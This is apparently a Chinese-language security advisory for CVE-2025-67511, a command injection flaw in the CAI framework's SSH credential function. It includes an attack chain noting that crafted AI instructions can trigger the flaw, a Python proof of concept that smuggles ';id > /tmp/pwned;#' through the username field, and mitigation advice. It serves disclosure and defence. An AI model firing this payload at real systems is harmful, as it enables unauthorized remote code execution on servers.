CVE-2025-67511 CVSS 9.6 严重

CVE-2025-67511: Cybersecurity AI run_ssh_command_with_credentials()命令注入漏洞

披露日期: 2025-12-11

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-67511

漏洞类型

命令注入

CVSS评分

9.6 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Cybersecurity AI (CAI)

漏洞概述

Cybersecurity AI (CAI)是一个开源框架，用于构建和部署AI驱动的攻防自动化工具。该框架在0.5.9及以下版本中存在严重的命令注入漏洞。漏洞位于run_ssh_command_with_credentials()函数中，该函数可供AI代理调用。在该函数的实现中，虽然对密码和命令输入进行了转义处理以防止shell注入，但用户名(hostname)、主机(host)和端口(port)参数未被正确转义，攻击者可以通过这些参数注入恶意命令。由于该漏洞无需认证即可利用，且具有完整的机密性、完整性和可用性影响，被评为严重级别（CVSS 9.6）。截至漏洞披露时，官方尚未发布修复版本。

技术细节

run_ssh_command_with_credentials()函数是CAI框架中用于通过SSH凭据执行命令的关键功能。该函数接收username、password、host、port和command五个参数。安全审计发现，password和command参数使用了适当的转义机制，但username、host和port参数直接拼接到SSH命令字符串中，缺少任何输入验证或转义处理。攻击者可以在这些参数中注入SSH命令分隔符（如;、|、&&等）或shell元字符，实现命令注入。成功利用后，攻击者可以在运行CAI框架的服务器上执行任意系统命令，完全控制目标系统。由于该函数设计为供AI代理使用，攻击者可以通过构造特定的AI指令或直接调用API的方式触发漏洞。

攻击链分析

STEP 1

步骤1

攻击者识别目标系统中运行的Cybersecurity AI (CAI)框架版本（需为0.5.9或以下）

STEP 2

步骤2

攻击者构造包含恶意命令的payload，利用username、host或port参数注入SSH命令

STEP 3

步骤3

攻击者通过AI指令或直接API调用触发run_ssh_command_with_credentials()函数

STEP 4

步骤4

由于username/host/port参数未转义，恶意命令被注入到SSH命令中执行

STEP 5

步骤5

攻击者获得目标服务器的远程代码执行权限，可执行任意系统命令

STEP 6

步骤6

攻击者可进一步进行横向移动、安装后门或窃取敏感数据

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-67511 PoC - Command Injection in CAI run_ssh_command_with_credentials()
# The username, host, and port parameters are not escaped

import requests
import json

# Target CAI instance
target_url = "http://target:8000/api/execute"

# Malicious payload - inject command via username parameter
# This will execute 'id > /tmp/pwned' on the target system
malicious_username = "test;id > /tmp/pwned;#"
malicious_host = "127.0.0.1"

payload = {
    "function": "run_ssh_command_with_credentials",
    "args": {
        "username": malicious_username,
        "password": "dummy_password",
        "host": malicious_host,
        "port": 22,
        "command": "echo test"
    }
}

response = requests.post(target_url, json=payload)
print(f"Status: {response.status_code}")
print(f"Response: {response.text}")

影响范围

Cybersecurity AI (CAI) <= 0.5.9

防御指南

临时缓解措施

由于当前无官方修复版本，建议采取以下临时措施：1) 限制CAI框架的网络暴露，仅允许受信任的IP访问；2) 监控和审计CAI框架的API调用日志；3) 使用网络ACL限制CAI服务器的出站连接；4) 考虑在CAI进程前部署Web应用防火墙(WAF)进行输入过滤；5) 定期检查官方安全公告，等待修复版本发布。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表